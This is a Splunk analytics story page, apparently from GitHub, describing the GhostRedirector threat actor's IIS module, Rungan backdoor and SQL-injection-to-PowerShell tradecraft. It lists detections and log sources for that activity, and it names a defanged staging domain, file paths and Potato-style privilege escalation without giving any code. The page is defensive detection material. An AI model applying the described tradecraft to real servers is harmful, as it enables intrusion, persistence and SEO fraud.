GitHub Repo

Analytics Story: GhostRedirector IIS Module and Rungan Backdoor

Date: 2025-09-18 ID: 69005a1d-05fa-4511-be91-aa260641ee10 Author: Michael Haag, Splunk Product: Splunk Enterprise Security

Description

This story tracks GhostRedirector, a China‑aligned threat actor that compromises Windows servers and abuses IIS to deliver SEO fraud alongside a passive C++ backdoor. The actor leverages web application flaws, most notably SQL injection, to execute PowerShell via sqlserver.exe and retrieve tooling from a shared staging infrastructure. Persistence and server‑side manipulation are achieved by installing a native IIS module, while command execution and basic backdoor capabilities are provided by the Rungan implant. Tooling, including privilege escalation components, is frequently staged in ProgramData paths and may be obfuscated or signed to evade controls.

Why it matters

Following initial access through exploitation of public‑facing applications, GhostRedirector issues PowerShell and CertUtil downloads from 868id[.]com to place binaries under C:\ProgramData\Microsoft\DRM\log. A malicious native IIS module (Gamshen) is registered so that w3wp.exe can selectively manipulate responses for search engine crawlers, enabling SEO fraud. In parallel, the group deploys the Rungan backdoor to execute commands over HTTP. Privilege escalation relies on public "Potato" techniques (for example EfsPotato and BadPotato) to create or modify local administrator accounts as fallback access. Observed tradecraft includes obfuscation with .NET Reactor, AES‑based string decryption, and occasional use of code‑signed binaries. The combined behaviors present multiple detection opportunities across IIS module installation and loading, webserver‑spawned shells, SQL Server xp_cmdshell abuse, privileged account creation, and unusual file staging or download activity in ProgramData.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
W3WP Spawning Shell Web Shell TTP
BITSAdmin Download File BITS Jobs, Ingress Tool Transfer TTP
CertUtil With Decode Argument Deobfuscate/Decode Files or Information TTP
Cisco NVM - Webserver Download From File Sharing Website Ingress Tool Transfer, Exploit Public-Facing Application TTP
Detect Exchange Web Shell External Remote Services, Exploit Public-Facing Application, Web Shell TTP
Detect Remote Access Software Usage File Remote Access Tools Anomaly
Detect Remote Access Software Usage Process Remote Access Tools Anomaly
Executables Or Script Creation In Suspicious Path Masquerading Anomaly
Headless Browser Mockbin or Mocky Request Hidden Window TTP
LOLBAS With Network Traffic Ingress Tool Transfer, Exfiltration Over Web Service, System Binary Proxy Execution TTP
Malicious PowerShell Process - Encoded Command Obfuscated Files or Information Hunting
Malicious PowerShell Process With Obfuscation Techniques PowerShell TTP
PowerShell 4104 Hunting PowerShell Hunting
Powershell Fileless Script Contains Base64 Encoded Content Obfuscated Files or Information, PowerShell TTP
Short Lived Windows Accounts Local Accounts, Local Account TTP
Suspicious Curl Network Connection Ingress Tool Transfer TTP
Suspicious Process Executed From Container File Malicious File, Masquerade File Type TTP
Web or Application Server Spawning a Shell Exploit Public-Facing Application, External Remote Services TTP
Windows Access Token Manipulation SeDebugPrivilege Create Process with Token Anomaly
Windows Create Local Account Local Account Anomaly
Windows Create Local Administrator Account Via Net Local Account Anomaly
Windows Curl Download to Suspicious Path Ingress Tool Transfer TTP
Windows File Download Via PowerShell PowerShell, Ingress Tool Transfer Anomaly
Windows HTTP Network Communication From MSIExec Msiexec Anomaly
Windows IIS Components Add New Module IIS Components Anomaly
Windows IIS Components Get-WebGlobalModule Module Query IIS Components Hunting
Windows IIS Components New Module Added IIS Components TTP
Windows Modify Registry Disable Restricted Admin Modify Registry TTP
Windows Obfuscated Files or Information via RAR SFX Encrypted/Encoded File Anomaly
Windows PowerShell IIS Components WebGlobalModule Usage IIS Components Anomaly
Windows PowerShell Invoke-Sqlcmd Execution PowerShell, Windows Command Shell Hunting
Windows Privilege Escalation Suspicious Process Elevation Exploitation for Privilege Escalation, Abuse Elevation Control Mechanism, Access Token Manipulation TTP
Windows Privilege Escalation User Process Spawn System Process Exploitation for Privilege Escalation, Abuse Elevation Control Mechanism, Access Token Manipulation TTP
Windows Process Execution From ProgramData Match Legitimate Resource Name or Location Anomaly
Windows SQL Server xp_cmdshell Config Change SQL Stored Procedures TTP
Windows SQLCMD Execution Windows Command Shell Hunting
Windows Suspicious Child Process Spawned From WebServer Web Shell TTP
Windows Suspicious Process File Path Create or Modify System Process, Match Legitimate Resource Name or Location TTP
Ivanti EPM SQL Injection Remote Code Execution Exploit Public-Facing Application TTP
SQL Injection with Long URLs Exploit Public-Facing Application TTP
Supernova Webshell Web Shell, External Remote Services TTP
Web Remote ShellServlet Access Exploit Public-Facing Application TTP

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
Cisco Network Visibility Module Flow Data Network icon Network cisco:nvm:flowdata not_applicable
CrowdStrike ProcessRollup2 N/A crowdstrike:events:sensor crowdstrike
Nginx Access N/A nginx:plus:kv /var/log/nginx/access.log
Powershell Installed IIS Modules Windows icon Windows Pwsh:InstalledIISModules powershell://AppCmdModules
Powershell Script Block Logging 4104 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Suricata N/A suricata suricata
Sysmon EventID 1 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 11 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 3 Windows icon Windows XmlWinEventLog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon for Linux EventID 1 Linux icon Linux sysmon:linux Syslog:Linux-Sysmon/Operational
Windows Event Log Application 15457 Windows icon Windows XmlWinEventLog XmlWinEventLog:Application
Windows Event Log Security 4688 Windows icon Windows XmlWinEventLog XmlWinEventLog:Security
Windows Event Log Security 4703 Windows icon Windows XmlWinEventLog XmlWinEventLog:Security
Windows Event Log Security 4720 Windows icon Windows XmlWinEventLog XmlWinEventLog:Security
Windows Event Log System 4720 Windows icon Windows XmlWinEventLog XmlWinEventLog:System
Windows Event Log System 4726 Windows icon Windows XmlWinEventLog XmlWinEventLog:System
Windows IIS 29 Windows icon Windows IIS:Configuration:Operational IIS:Configuration:Operational

References

Source: GitHub | Version: 1